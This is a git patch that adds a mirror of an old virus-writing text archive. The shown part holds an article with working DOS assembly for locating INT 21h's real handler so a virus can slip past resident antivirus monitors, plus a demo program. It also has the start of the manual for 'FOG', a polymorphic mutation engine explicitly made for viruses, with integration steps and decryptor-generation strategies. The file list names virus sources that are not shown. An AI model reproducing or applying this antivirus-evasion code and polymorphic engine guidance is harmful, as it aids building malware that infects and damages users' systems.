From b1044beb6e9760ff8aa0b4ffacc55417fe9550c3 Mon Sep 17 00:00:00 2001
From: OPSXCQ <opsxcq@strm.sh>
Date: Fri, 16 Mar 2018 23:04:53 -0300
Subject: [PATCH] update

---
 textfiles.com/virus/fndint21.txt   |  376 +++
 textfiles.com/virus/fog.txt        |  585 +++++
 textfiles.com/virus/fullstlt.txt   |  254 ++
 textfiles.com/virus/funbot2.cvp    |   56 +
 textfiles.com/virus/funbot3.cvp    |   58 +
 textfiles.com/virus/fungen1.cvp    |   56 +
 textfiles.com/virus/fungen2.cvp    |  Bin 0 -> 2721 bytes
 textfiles.com/virus/fungen3.cvp    |   53 +
 textfiles.com/virus/fungen4.cvp    |   52 +
 textfiles.com/virus/fungen5.cvp    |   57 +
 textfiles.com/virus/fungen6.cvp    |   57 +
 textfiles.com/virus/fungen7.cvp    |   56 +
 textfiles.com/virus/fungen8.cvp    |   58 +
 textfiles.com/virus/fungen9.cvp    |   52 +
 textfiles.com/virus/fungena.cvp    |   56 +
 textfiles.com/virus/funpiv1.cvp    |   47 +
 textfiles.com/virus/funpiv2.cvp    |   48 +
 textfiles.com/virus/funpiv3.cvp    |   51 +
 textfiles.com/virus/funpiv4.cvp    |   57 +
 textfiles.com/virus/funpiv5.cvp    |   56 +
 textfiles.com/virus/g2.txt         |  564 +++++
 textfiles.com/virus/gao_rpt        | 2375 +++++++++++++++++++
 textfiles.com/virus/gf.txt         |   69 +
 textfiles.com/virus/glath.vir      |  552 +++++
 textfiles.com/virus/gold-bug.txt   |  161 ++
 textfiles.com/virus/goodwin.txt    | 3516 ++++++++++++++++++++++++++++
 textfiles.com/virus/greetng1.txt   |   43 +
 textfiles.com/virus/guardian.bbs   |  530 +++++
 textfiles.com/virus/guardian.vir   | 1032 ++++++++
 textfiles.com/virus/hackmisc.9     |  169 ++
 textfiles.com/virus/hate.txt       |   20 +
 textfiles.com/virus/hatedetect.vir |  159 ++
 textfiles.com/virus/hitler.a86     |  718 ++++++
 textfiles.com/virus/hormones.vir   |  379 +++
 textfiles.com/virus/hr5061.vir     |   61 +
 textfiles.com/virus/hysteria.vir   |  360 +++
 textfiles.com/virus/ibmpaper.vir   | 2377 +++++++++++++++++++
 textfiles.com/virus/identify.txt   |  339 +++
 textfiles.com/virus/illegal.nfo    |   36 +
 textfiles.com/virus/implemen.mca   |  765 ++++++
 textfiles.com/virus/index.mag      |   29 +
 textfiles.com/virus/intro1.cvp     |   49 +
 textfiles.com/virus/ivm-95.1       | 3376 ++++++++++++++++++++++++++
 textfiles.com/virus/jeru-b.asm     |  794 +++++++
 textfiles.com/virus/jeru-dc.vir    |   83 +
 textfiles.com/virus/jtinterv.iew   |  420 ++++
 textfiles.com/virus/jvvirus.txt    |  814 +++++++
 textfiles.com/virus/killhead.vir   |   32 +
 textfiles.com/virus/levine.pap     |  240 ++
 textfiles.com/virus/lminterv.iew   | 1080 +++++++++
 textfiles.com/virus/locprst.txt    |  670 ++++++
 textfiles.com/virus/ltlmess.slt    |   91 +
 textfiles.com/virus/lzinterv.iew   |  662 ++++++
 textfiles.com/virus/macv.txt       |  121 +
 textfiles.com/virus/malmsey.txt    |   75 +
 textfiles.com/virus/mayhem.txt     |   46 +
 textfiles.com/virus/mbfamily.txt   |  157 ++
 textfiles.com/virus/mbinterv.iew   |  296 +++
 textfiles.com/virus/mcaffvirus.txt |  118 +
 textfiles.com/virus/mdef.inf       |  Bin 0 -> 4864 bytes
 textfiles.com/virus/melissa.txt    |  277 +++
 textfiles.com/virus/memres.txt     |  185 ++
 textfiles.com/virus/michael.asm    |  234 ++
 textfiles.com/virus/michangl.txt   |  225 ++
 textfiles.com/virus/mk-chart.txt   |   73 +
 textfiles.com/virus/mkinterv.iew   |  304 +++
 textfiles.com/virus/mkvirlst.txt   |  450 ++++
 textfiles.com/virus/necro.a86      |  395 ++++
 textfiles.com/virus/net.hor        |  378 +++
 textfiles.com/virus/newinstl.txt   |   29 +
 textfiles.com/virus/nist01.txt     |  105 +
 textfiles.com/virus/nist02.txt     |   99 +
 textfiles.com/virus/offspr82.txt   |   36 +
 textfiles.com/virus/p1.txt         |  186 ++
 textfiles.com/virus/pcblkjck.txt   |  Bin 0 -> 4608 bytes
 textfiles.com/virus/peacevir.vir   |   58 +
 textfiles.com/virus/ph-vir1.txt    |  445 ++++
 textfiles.com/virus/pngintrv.iew   |  268 +++
 textfiles.com/virus/polyflag.txt   |  507 ++++
 textfiles.com/virus/polymorf.txt   |  750 ++++++
 textfiles.com/virus/polymorph.txt  |  343 +++
 textfiles.com/virus/polymrph.txt   |  249 ++
 textfiles.com/virus/polyvir.txt    |  107 +
 textfiles.com/virus/popscia86.vir  |  122 +
 textfiles.com/virus/portexec.txt   |  220 ++
 textfiles.com/virus/ps-vir1.txt    |  449 ++++
 textfiles.com/virus/ps-vir2.txt    |  594 +++++
 textfiles.com/virus/ps-vir3.txt    |  442 ++++
 textfiles.com/virus/ps-vir4.txt    |  377 +++
 textfiles.com/virus/ps-vir5.txt    |  441 ++++
 textfiles.com/virus/ps_vir1.vir    |  447 ++++
 textfiles.com/virus/ps_vir2.vir    |  596 +++++
 textfiles.com/virus/ps_vir3.vir    |  444 ++++
 textfiles.com/virus/ps_vir4.vir    |  379 +++
 textfiles.com/virus/qkinterv.iew   |  445 ++++
 textfiles.com/virus/rab_mem.apl    |  139 ++
 textfiles.com/virus/ratboy-1.txt   |  294 +++
 textfiles.com/virus/ratboy-2.txt   |  404 ++++
 textfiles.com/virus/readlist.vir   |  441 ++++
 textfiles.com/virus/resist.txt     |  575 +++++
 textfiles.com/virus/rjinterv.iew   |  649 +++++
 textfiles.com/virus/robin.hod      |  140 ++
 textfiles.com/virus/rstut001.txt   |  176 ++
 textfiles.com/virus/rstut002.txt   |  175 ++
 textfiles.com/virus/rstut003.txt   |  191 ++
 textfiles.com/virus/rstut004.txt   |  255 ++
 textfiles.com/virus/rstut005.txt   |  175 ++
 textfiles.com/virus/rstut006.txt   |  101 +
 textfiles.com/virus/rstut007.txt   |  157 ++
 textfiles.com/virus/rstut008.txt   |   97 +
 textfiles.com/virus/rstut009.txt   |   72 +
 textfiles.com/virus/rstut010.txt   |  540 +++++
 112 files changed, 40703 insertions(+)
 create mode 100644 textfiles.com/virus/fndint21.txt
 create mode 100644 textfiles.com/virus/fog.txt
 create mode 100644 textfiles.com/virus/fullstlt.txt
 create mode 100644 textfiles.com/virus/funbot2.cvp
 create mode 100644 textfiles.com/virus/funbot3.cvp
 create mode 100644 textfiles.com/virus/fungen1.cvp
 create mode 100644 textfiles.com/virus/fungen2.cvp
 create mode 100644 textfiles.com/virus/fungen3.cvp
 create mode 100644 textfiles.com/virus/fungen4.cvp
 create mode 100644 textfiles.com/virus/fungen5.cvp
 create mode 100644 textfiles.com/virus/fungen6.cvp
 create mode 100644 textfiles.com/virus/fungen7.cvp
 create mode 100644 textfiles.com/virus/fungen8.cvp
 create mode 100644 textfiles.com/virus/fungen9.cvp
 create mode 100644 textfiles.com/virus/fungena.cvp
 create mode 100644 textfiles.com/virus/funpiv1.cvp
 create mode 100644 textfiles.com/virus/funpiv2.cvp
 create mode 100644 textfiles.com/virus/funpiv3.cvp
 create mode 100644 textfiles.com/virus/funpiv4.cvp
 create mode 100644 textfiles.com/virus/funpiv5.cvp
 create mode 100644 textfiles.com/virus/g2.txt
 create mode 100644 textfiles.com/virus/gao_rpt
 create mode 100644 textfiles.com/virus/gf.txt
 create mode 100644 textfiles.com/virus/glath.vir
 create mode 100644 textfiles.com/virus/gold-bug.txt
 create mode 100644 textfiles.com/virus/goodwin.txt
 create mode 100644 textfiles.com/virus/greetng1.txt
 create mode 100644 textfiles.com/virus/guardian.bbs
 create mode 100644 textfiles.com/virus/guardian.vir
 create mode 100644 textfiles.com/virus/hackmisc.9
 create mode 100644 textfiles.com/virus/hate.txt
 create mode 100644 textfiles.com/virus/hatedetect.vir
 create mode 100644 textfiles.com/virus/hitler.a86
 create mode 100644 textfiles.com/virus/hormones.vir
 create mode 100644 textfiles.com/virus/hr5061.vir
 create mode 100644 textfiles.com/virus/hysteria.vir
 create mode 100644 textfiles.com/virus/ibmpaper.vir
 create mode 100644 textfiles.com/virus/identify.txt
 create mode 100644 textfiles.com/virus/illegal.nfo
 create mode 100644 textfiles.com/virus/implemen.mca
 create mode 100644 textfiles.com/virus/index.mag
 create mode 100644 textfiles.com/virus/intro1.cvp
 create mode 100644 textfiles.com/virus/ivm-95.1
 create mode 100644 textfiles.com/virus/jeru-b.asm
 create mode 100644 textfiles.com/virus/jeru-dc.vir
 create mode 100644 textfiles.com/virus/jtinterv.iew
 create mode 100644 textfiles.com/virus/jvvirus.txt
 create mode 100644 textfiles.com/virus/killhead.vir
 create mode 100644 textfiles.com/virus/levine.pap
 create mode 100644 textfiles.com/virus/lminterv.iew
 create mode 100644 textfiles.com/virus/locprst.txt
 create mode 100644 textfiles.com/virus/ltlmess.slt
 create mode 100644 textfiles.com/virus/lzinterv.iew
 create mode 100644 textfiles.com/virus/macv.txt
 create mode 100644 textfiles.com/virus/malmsey.txt
 create mode 100644 textfiles.com/virus/mayhem.txt
 create mode 100644 textfiles.com/virus/mbfamily.txt
 create mode 100644 textfiles.com/virus/mbinterv.iew
 create mode 100644 textfiles.com/virus/mcaffvirus.txt
 create mode 100644 textfiles.com/virus/mdef.inf
 create mode 100644 textfiles.com/virus/melissa.txt
 create mode 100644 textfiles.com/virus/memres.txt
 create mode 100644 textfiles.com/virus/michael.asm
 create mode 100644 textfiles.com/virus/michangl.txt
 create mode 100644 textfiles.com/virus/mk-chart.txt
 create mode 100644 textfiles.com/virus/mkinterv.iew
 create mode 100644 textfiles.com/virus/mkvirlst.txt
 create mode 100644 textfiles.com/virus/necro.a86
 create mode 100644 textfiles.com/virus/net.hor
 create mode 100644 textfiles.com/virus/newinstl.txt
 create mode 100644 textfiles.com/virus/nist01.txt
 create mode 100644 textfiles.com/virus/nist02.txt
 create mode 100644 textfiles.com/virus/offspr82.txt
 create mode 100644 textfiles.com/virus/p1.txt
 create mode 100644 textfiles.com/virus/pcblkjck.txt
 create mode 100644 textfiles.com/virus/peacevir.vir
 create mode 100644 textfiles.com/virus/ph-vir1.txt
 create mode 100644 textfiles.com/virus/pngintrv.iew
 create mode 100644 textfiles.com/virus/polyflag.txt
 create mode 100644 textfiles.com/virus/polymorf.txt
 create mode 100644 textfiles.com/virus/polymorph.txt
 create mode 100644 textfiles.com/virus/polymrph.txt
 create mode 100644 textfiles.com/virus/polyvir.txt
 create mode 100644 textfiles.com/virus/popscia86.vir
 create mode 100644 textfiles.com/virus/portexec.txt
 create mode 100644 textfiles.com/virus/ps-vir1.txt
 create mode 100644 textfiles.com/virus/ps-vir2.txt
 create mode 100644 textfiles.com/virus/ps-vir3.txt
 create mode 100644 textfiles.com/virus/ps-vir4.txt
 create mode 100644 textfiles.com/virus/ps-vir5.txt
 create mode 100644 textfiles.com/virus/ps_vir1.vir
 create mode 100644 textfiles.com/virus/ps_vir2.vir
 create mode 100644 textfiles.com/virus/ps_vir3.vir
 create mode 100644 textfiles.com/virus/ps_vir4.vir
 create mode 100644 textfiles.com/virus/qkinterv.iew
 create mode 100644 textfiles.com/virus/rab_mem.apl
 create mode 100644 textfiles.com/virus/ratboy-1.txt
 create mode 100644 textfiles.com/virus/ratboy-2.txt
 create mode 100644 textfiles.com/virus/readlist.vir
 create mode 100644 textfiles.com/virus/resist.txt
 create mode 100644 textfiles.com/virus/rjinterv.iew
 create mode 100644 textfiles.com/virus/robin.hod
 create mode 100644 textfiles.com/virus/rstut001.txt
 create mode 100644 textfiles.com/virus/rstut002.txt
 create mode 100644 textfiles.com/virus/rstut003.txt
 create mode 100644 textfiles.com/virus/rstut004.txt
 create mode 100644 textfiles.com/virus/rstut005.txt
 create mode 100644 textfiles.com/virus/rstut006.txt
 create mode 100644 textfiles.com/virus/rstut007.txt
 create mode 100644 textfiles.com/virus/rstut008.txt
 create mode 100644 textfiles.com/virus/rstut009.txt
 create mode 100644 textfiles.com/virus/rstut010.txt

diff --git a/textfiles.com/virus/fndint21.txt b/textfiles.com/virus/fndint21.txt
new file mode 100644
index 00000000..d4929cd4
--- /dev/null
+++ b/textfiles.com/virus/fndint21.txt
@@ -0,0 +1,376 @@
+
+
+
+                 FINDING INT 21's REAL ADDRESS USING THE PSP
+                 �������������������������������������������
+
+
+                           by Satan's Little Helper
+
+
+    DESCRIPTION
+    �����������
+
+            The real address of interrupt 21 is useful to almost
+        all viruses it enables viruses to bypass resident monitoring
+        software loaded as device drivers or TSR's.  This article will
+        demonstrate a method by which you can obtain the real address
+        of INT 21 by using the entry at offset 6 in the PSP segment.
+
+            PSP:6 contains a double-word pointing (hopefully) to the
+        dos dispatch handler (this is different from the INT 21
+        handler).  Then *optionally* the dispatch handler has a series
+        of jumps (opcode=0EAh) then it will either a) point to the
+        dos dispatch handler or b) the double-NOP call construct used
+        in some DOS versions which will then point to (a).
+
+            The dos dispatch handler and int 21 handler in memory appear
+        like this:
+
+    dos_dispatch_handler:
+        0000  1E                   push    ds
+        0001  2E: 8E 1E 3DE7       mov     ds,word ptr cs:[3DE7h]
+        0006  8F 06 05EC           pop     word ptr ds:[5ECh]
+        000A  58                   pop     ax
+        000B  58                   pop     ax
+        000C  8F 06 0584           pop     word ptr ds:[584h]
+        0010  9C                   pushf
+        0011  FA                   cli
+        0012  50                   push    ax
+        0013  FF 36 0584           push    word ptr ds:[584h]
+        0017  FF 36 05EC           push    word ptr ds:[5ECh]
+        001B  1F                   pop     ds
+        001C  80 F9 24             cmp     cl,24h
+        001F  77 DC                ja      $-22h
+        0021  8A E1                mov     ah,cl
+        0023  EB 06                jmp     $+8
+    int21_handler:
+        0025  FA                   cli
+        0026  80 FC 6C             cmp     ah,6Ch
+        0029  77 D2                ja      $-2Ch
+        002B  80 FC 33             cmp     ah,33h
+
+    therefore:
+
+        int21_handler = dos_dispatch_handler + 25h
+
+            So the end result is we just find 'dos_dispatch_hndlr'
+        address then check that the opcodes are right (1E2E/FA80)
+        and then add (int21_handler-dos_dispatch_hndlr) to the
+        pointer to dos_dispatch_hndlr to get the INT 21 handler
+        address.
+
+        Simple! (read it again if you don't get it).
+
+        In the case of (b) occurring we just do the same except
+        the offset of the dispatch handler from the int 21
+        handler is different:
+
+        0000  90                   nop
+        0001  90                   nop
+        0002  E8 00E0              call    $+0E3h
+        0005  2E: FF 2E 1062       jmp     dword ptr cs:[1062h]
+        000A  90                   nop
+        000B  90                   nop
+        000C  E8 00D6              call    $+0D9h
+        000F  2E: FF 2E 1066       jmp     dword ptr cs:[1066h]
+    int21_handler:
+        0014  90                   nop
+        0015  90                   nop
+        0016  E8 00CC              call    $+0CFh
+        0019  2E: FF 2E 106A       jmp     dword ptr cs:[106Ah]
+        001E  90                   nop
+        001F  90                   nop
+        0020  E8 00C2              call    $+0C5h
+        0023  2E: FF 2E 106E       jmp     dword ptr cs:[106Eh]
+        0028  90                   nop
+        0029  90                   nop
+        002A  E8 00B8              call    $+0BBh
+        002D  2E: FF 2E 1072       jmp     dword ptr cs:[1072h]
+        0032  90                   nop
+        0033  90                   nop
+        0034  E8 00AE              call    $+0B1h
+        0037  2E: FF 2E 1076       jmp     dword ptr cs:[1076h]
+        003C  90                   nop
+        003D  90                   nop
+        003E  E8 00A4              call    $+0A7h
+        0041  2E: FF 2E 107A       jmp     dword ptr cs:[107Ah]
+    dos_dispatch_handler:
+        0046  90                   nop
+        0047  90                   nop
+        0048  E8 009A              call    $+9Dh
+        004B  2E: FF 2E 107E       jmp     dword ptr cs:[107Eh]
+
+    therefore:
+
+        int21_handler = dos_dispatch_handler - 32h
+
+
+    ADVANTAGES & DISADVANTAGES OF THIS METHOD
+    �����������������������������������������
+
+            This method requires a very small amount of code and
+        can be made even more efficient than the code shown below.
+
+            Although untrappable it can be confused into tracing
+        into the resident monitor's trapping code.  Much of the
+        logic of this method is hard coded so changes in the
+        opcodes (from TSR AV utilities) will be able to trick it
+        into thinking it has found the correct address (this
+        requires use of the double-NOP signatures).
+
+            AV developers appear to be reluctant to modify their
+        software for specific viruses so may avoid placing the
+        sequence to confuse it into their software.
+
+    CODE
+    ����
+
+        This code is not designed to be size efficent it is designed
+        to be easy to understand.
+
+        ;name:      psp_trace
+        ;in cond:   ds=psp segment
+        ;out cond:  ds:bx=int 21 address if carry clear
+        ;           ds:bx=nothing if carry set.
+        ;purpose:   finds int 21 address using a PSP trace.
+
+        psp_trace:
+            lds     bx,ds:[0006h]           ;point to dispatch handler
+        trace_next:
+            cmp     byte ptr ds:[bx],0EAh   ;is it JMP xxxx:xxxx ?
+            jnz     check_dispatch
+            lds     bx,ds:[bx+1]            ;point to xxxx:xxxx of the JMP
+            cmp     word ptr ds:[bx],9090h  ;check for double-NOP signature
+            jnz     trace_next
+            sub     bx,32h                  ;32h byte offset from dispatch
+                                            ;handler
+            cmp     word ptr ds:[bx],9090h  ;int 21 has same sig if it works
+            jnz     check_dispatch
+        good_search:
+            clc
+            ret
+        check_dispatch:
+            cmp     word ptr ds:[bx],2E1Eh  ;check for push ds, cs: override
+            jnz     bad_exit
+            add     bx,25h                  ;25h byte offset from dispatch
+            cmp     word ptr ds:[bx],80FAh  ;check for cli, push ax
+            jz      good_search
+        bad_exit:
+            stc
+            ret
+
+    NOTES
+    �����
+
+            INT 30h and INT 31h contain *code* (not an address) to
+        jump to the dispatch handler so to trace using INT 30h/31h
+        you just set ds:bx to 0:c0 and call the trace_next in the
+        psp_trace routine.
+
+        Debug hex dump of INT 30/31 addresses in the IVT:
+
+                  Immediate far JMP
+                    ____________
+        -d 0:c0    |            |
+        0000:00C0  EA 28 00 02 01 FF 00 F0-0F 00 02 01 DF 0D 39 01
+                   |_________| |_________|
+                      INT 30     INT 31
+                       addr       addr
+
+        EA 28 00 02 01 = JMP 0102:0028
+
+        ;name:      int30_trace
+        ;out cond:  ds:bx=int 21 address if carry clear
+        ;           ds:bx=nothing if carry set.
+        ;purpose:   finds int 21 address using an INT 30/31 trace.
+
+        int30_trace:
+            xor     bx,bx
+            mov     ds,bx
+            mov     bl,0c0h                 ;point to 0:0c0
+            jmp     short trace_next
+
+
+    OTHER NOTES
+    �����������
+
+        After writing this I heard that the "MG" virus uses the same
+        technique, I have a sample of this virus and it does not use
+        the same technique.
+
+
+    TESTING
+    �������
+
+            So far this has been tested on MSDOS 6.x, Novell Netware,
+        and IBM network software all resulting in positive tests.
+
+            Machines running DR DOS, Novell DOS, 4DOS, OS/2 and NT
+        could not be found.  It is expected that this will not work
+        on *ALL* DOS-type platforms but that is why I implemented
+        error codes in the form of the carry flag being set/clear.
+
+
+    CONCLUSION
+    ����������
+
+            It has been shown that INT 30h/31h is slightly more
+        reliable than the PSP:6 address, so if a call to psp_trace
+        results in carry set then call int30_trace.  The reason
+        you should call PSP trace first is that altering INT 30/31
+        is much easier than altering PSP:6 so it makes the AV do
+        more work ;)
+
+
+    CREDITS
+    �������
+
+        TaLoN - helped in working out offsets and told me
+                about int 30h/31h pointing to dispatch handler.
+        Lookout Man - tester
+        Aardvark - network tester
+
+    DEMO PROGRAM
+    ������������
+
+
+    ;-------8<--------cut here---------8<-------
+
+    comment |
+
+        TASM ASSEMBLY:
+            tasm psptest.asm
+            tlink /t psptest.obj
+
+        A86 ASSEMBLY:
+            a86 psptest.asm
+    |
+
+    .model tiny
+    .code
+
+    org     100h
+
+start:
+    mov     dx,offset psp_status
+    call    print_str                       ;print "PSP trace: "
+    call    psp_trace                       ;do the trace
+    jc      bad_psp
+print_status:
+    mov     dx,offset ok_str                ;print "Ok!"
+    call    print_str
+    mov     dx,offset psp_addr              ;print "interrupt trace to: "
+    call    print_str
+    push    bx
+    mov     bx,ds                           ;print segment
+    call    bin_to_hex
+    call    print_colon                     ;print ":"
+    pop     bx
+    call    bin_to_hex                      ;print offset
+    jmp     do_int30
+bad_psp:
+    mov     dx,offset bad_str
+    call    print_str
+do_int30:
+    nop
+    nop
+    mov     word ptr cs:do_int30,20CDh      ;exit next time around
+    mov     dx,offset i30_status
+    call    print_str                       ;print "PSP trace: "
+    call    int30_trace
+    jnc     print_status
+    jmp     short do_int30
+
+print_str:
+    mov     ah,9
+    push    ds
+    push    cs
+    pop     ds
+    int     21h
+    pop     ds
+    ret
+
+psp_addr    db  13,10,'Interrupt traced to: $'
+psp_status  db  13,10,'PSP trace      : $'
+i30_status  db  13,10,'INT 30/31 trace: $'
+ok_str      db  'Ok!$'
+bad_str     db  'Failure$'
+
+;name:      psp_trace
+;in cond:   ds=psp segment
+;out cond:  ds:bx=int 21 address if carry clear
+;           ds:bx=nothing if carry set.
+;purpose:   finds int 21 address using a PSP trace.
+
+psp_trace:
+    lds     bx,ds:[0006h]           ;point to dispatch handler
+trace_next:
+    cmp     byte ptr ds:[bx],0EAh   ;is it JMP xxxx:xxxx ?
+    jnz     check_dispatch
+    lds     bx,ds:[bx+1]            ;point to xxxx:xxxx of the JMP
+    cmp     word ptr ds:[bx],9090h  ;check for double-NOP signature
+    jnz     trace_next
+    sub     bx,32h                  ;32h byte offset from dispatch
+                                    ;handler
+    cmp     word ptr ds:[bx],9090h  ;int 21 has same sig if it works
+    jnz     check_dispatch
+good_search:
+    clc
+    ret
+check_dispatch:
+    cmp     word ptr ds:[bx],2E1Eh  ;check for push ds, cs: override
+    jnz     bad_exit
+    add     bx,25h                  ;25h byte offset from dispatch
+    cmp     word ptr ds:[bx],80FAh  ;check for cli, push ax
+    jz      good_search
+bad_exit:
+    stc
+    ret
+
+;name:      int30_trace
+;out cond:  ds:bx=int 21 address if carry clear
+;           ds:bx=nothing if carry set.
+;purpose:   finds int 21 address using an INT 30/31 trace.
+
+int30_trace:
+    xor     bx,bx
+    mov     ds,bx
+    mov     bl,0c0h                 ;point to 0:0c0
+    jmp     short trace_next
+
+bin_to_hex:                         ;will print number in BX as hex
+    push    cx                      ;code stolen from KRTT demo
+    push    dx
+    push    ax
+    mov     ch,4
+rotate:
+    mov     cl,4
+    rol     bx,cl
+    mov     al,bl
+    and     al,0Fh
+    add     al,30h
+    cmp     al,'9'+1
+    jl      print_it
+    add     al,07h
+print_it:
+    mov     dl,al
+    mov     ah,2
+    int     21h
+    dec     ch
+    jnz     rotate
+    pop     ax
+    pop     dx
+    pop     cx
+    ret
+
+print_colon:
+    mov     ah,2
+    mov     dl,':'
+    int     21h
+    ret
+
+    end     start
+
+    ;-------8<--------cut here---------8<-------
+
diff --git a/textfiles.com/virus/fog.txt b/textfiles.com/virus/fog.txt
new file mode 100644
index 00000000..e2457dda
--- /dev/null
+++ b/textfiles.com/virus/fog.txt
@@ -0,0 +1,585 @@
+
+
+
+
+
+
+
+
+
+
+				FOG
+
+		A polymorphic encryption algorithm
+
+			   by Eclipse
+
+
+
+
+
+
+
+
+
+
+
+	Disclaimer:
+
+	I have made this mutation engine for fun purposes only.
+	It is made for use in viruses, but not as to promote any
+	intentional harm or damage on computer systems.
+
+	This engine is dedicated to those of you out there who find the
+	concept of replicating programs fascinating. Trojan and
+	destructive virus writers: Get a life.
+
+
+
+
+
+
+
+	USAGE: CODE MODIFICATION INSTRUCTIONS
+
+	1.  Enter the statement "extrn fog:near, fog_init:near, rnd:near"
+	into your code in your code segment. Its not really necessary to
+	include the "rnd" part if you do not need a random number generator
+	in your code. You might also find it handy to include the switch
+	definition file (switches.inc) in your code.
+
+
+
+	Example (ideal mode):
+		......
+		.model tiny
+		.radix 16
+		ideal
+
+		segment code word
+		assume cs:code, ds:code, es:code, ss:code
+
+		org 100h
+
+		extrn fog:near, fog_init:near, rnd:near         ;here
+		include "switches.inc"                          ;and here
+		......
+
+
+	or (MASM simplified mode):
+		......
+		.model tiny
+		.radix 16
+		.code
+
+		org 100h
+
+		extrn fog:near, fog_init:near, rnd:near         ;here
+		include switches.inc                            ;and here
+		......
+
+	or (MASM mode):
+		......
+		.model tiny
+		.radix 16
+
+		code segment word
+		assume cs:code, ds:code, es:code, ss:code
+
+		org 100h
+
+		extrn fog:near, fog_init:near, rnd:near         ;here
+		include switches.inc                            ;and here
+		......
+
+
+
+	2.  Initialise fog. Do so by calling fog_init with the appropriate
+	parameters:
+	AH      :       Debugger hostility switches     (see below)
+	AL      :       Junk generation switches        ( ---"--- )
+	CL      :       General switches                ( ---"--- )
+
+	CS:DX   :       Code to encrypt
+	SI      :       Size of code to encrypt
+	DI      :       Where in the decrypted code control should be passed.
+			eg. if execution starts at the beginning of the code,
+			DI = 0.
+
+	Note that this initialization could be done only once, f.ex. at the
+	installation of a TSR virus, and later only be called when there was
+	need for updating the information, typically changing from COM to EXE
+	mutation mode.
+
+	On return from fog_init only one register will have changed;
+
+	CX      =       Max size of decryptor and encrypted code. This
+			will be the amount of bytes to stealth if you
+			are making a stealth virus and have specified
+			constant code size (sw_const_s) or if you want
+			a tip of how much memory you gonna need for 
+			encryption, otherwise ignore.
+
+
+
+	Example:
+
+		....
+		mov  ah, sw_prefetch or sw_int3
+		mov  al, sw_015_gi
+			;or more efficiently:
+			;mov  ax, (sw_prefetch or sw_int3) shl 8 or sw_015_gi
+		mov  cl, sw_const_s
+		mov  dx, cs:[myoffset]
+		mov  si, sizeofvirus
+		xor  di, di
+		call fog_init
+		....
+
+
+
+	3. Mutate by calling fog with the following parameters:
+
+	ES      : Free segment. This is where the mutated code will be put.
+		Must contain enough memory for the encrypted code
+		and decryptor. When you define high junk generation, the
+		decryptor can be rather ...errr... massive...
+
+
+	BP      : Offset of code. Eg. if you write the mutated code to the
+		end of a COM file, then BP should be set to filesize+100h.
+
+
+	Example:
+		....
+		mov  bp, ax
+		add  bp, 0100
+		mov  ax, cs
+		dec  ax, (bufferneeded+0fh)/10h
+		mov  es, ax
+		call fog
+		mov  ah, 40     ;CX = number of bytes, DS:DX = buffer
+		int  21
+		....
+
+
+
+	4. Take note of the register values on return from the
+	fog mutation algorithm:
+
+	DS:DX = ES:0 = Buffer where decryptor and encrypted code will
+		be found.
+
+	CX    = Length of decryptor and encrypted code.
+
+	All other registers are preserved.
+
+
+
+
+	USAGE: MEMORY REQUIREMENTS
+
+	When calling fog you should make sure that you have an
+	encryption buffer big enough to accomodate even the largest
+	decryptors + your encrypted code. On its most demanding setting
+	(sw_255_gi / sw_maxhostile) fog will require approximately 16k
+	of memory. If you use fixed file size, the memory required can
+	be even more massive. However, if you reduce the junk generation,
+	fog will need much less memory.
+
+	When you call fog_init, CX will return the maximum size (in bytes)
+	needed.
+
+	Note: Take a look on what I do in AirRaid. I steal a temporary
+	block of memory just to do the encryption, without allocating
+	it. This will work nicely most of the time.
+
+
+
+
+
+
+	USAGE: ASSEMBLY INSTRUCTIONS
+
+	Fog is written in TASM 3.0 (C) Borland Inc. and is designed
+	to work with tasm and tasm-compatible assemblers.
+	To use the fog object module in your code:
+
+	tasm /m3 myvir.asm
+	tlink (/t) myvir fog
+
+	If you select to assemble fog down from the source, you should
+	use
+
+	tasm /m3 fog.asm
+
+	before linking the resultant object module into your code.
+
+
+
+
+
+	-------------------------------------------------------------------
+	The code size of FOG in its present condition is 55Bh (1371) bytes.
+	-------------------------------------------------------------------
+	If you modify the source, assemble with TASM /m3 /l and take a
+	look on top of the lst file; there will be a constant named
+	fogsize - this is FOG's effective length.
+
+
+
+
+
+	TECHNICAL OVERVIEW:
+
+	Fog constructs its decryptor in a stepwise manner.
+	The flow of execution when encrypting can be summarised like this:
+
+	* Choose Initialization strategy
+	* Choose Crypt strategy
+	* Choose Base updating strategy
+	* Choose Loopback strategy
+
+	(Decryptor and encryptor are finished here !!!)
+
+	* Add a jump to starting point in code, often this will be just a JMP 0.
+	* Encrypt main code
+	* If some alignment or static code size is chosen, pad the encrypted
+	  code until it has the right size.
+	* Set all registers according to the correct feedback values, and
+	  return to caller.
+
+
+	STRATEGIES:
+
+	**** Init Strategy ****
+	This is done by randomly choosing registers for key, base and count
+	and generate MOV reg, imm16 instructions with the appropriate numbers.
+	Junk (if selected) will be filled in between these instructions.
+
+
+	**** Crypt strategy ****
+	The standard crypto instruction will be of the type:
+	( The / separates options that are used with equal probability )
+
+	RND 1..15 * (XOR/SUB/ADD  CS:/DS:/ES:/SS: [BX/SI/DI]/[BX/SI/DI+disp16], imm16/reg)
+	RND 0..7  * (ROL reg,1)
+
+	The segment overrides DS:/ES:/SS: will of course only be created in
+	COM file mode, in EXE mode only CS: will appear.
+
+	So decryptors can look like this:
+
+	XOR     SS:[SI+0490],FD81       + junk
+	XOR     CS:[SI+0490],DX           "
+	ADD     CS:[SI+0490],DX           "
+	SUB     CS:[SI+0490],8755         "
+	XOR     ES:[SI+0490],5886         "
+	ADD     SS:[SI+0490],770B         "
+	ADD     DS:[SI+0490],0322         "
+	ROL     DX,1                      "
+	ROL     DX,1                      "
+	ROL     DX,1                      "
+
+	or like this:
+
+	XOR     SS:[BX],DX              + junk
+
+	At the same time as the decryptor instructions are generated, the encryptor
+	is inversely built in the encryptor buffer.
+	As you will have noticed, the key is always word sized.
+
+
+	**** Base updating strategy ****
+	Base updating instructions can be of the type:
+	ADD  reg, 2/-2
+	or
+	SUB  reg, 2/-2
+	or
+	DEC  reg
+	DEC  reg
+	or
+	INC  reg
+	INC  reg
+
+
+	**** Loopback strategy ****
+	Loopbacks will look like this:
+
+	LOOP ...
+
+	or
+
+	DEC  reg
+	JNZ  .....
+
+	(The above will only be used if backwards jump is less than 128 bytes.)
+
+	or
+
+	DEC  reg
+	JZ   03
+	JMP  ....
+
+	or
+
+	DEC  reg
+	JZ   05
+	MOV  reg, offset ....
+	PUSH reg
+	RET
+
+
+	There are many more ways to do this, of course, use your
+	imagination and add some.
+
+
+	STRONG POINTS:
+
+	* Cryptographic toughness
+	FOG utilises a powerful mutation encryption algorithm, making
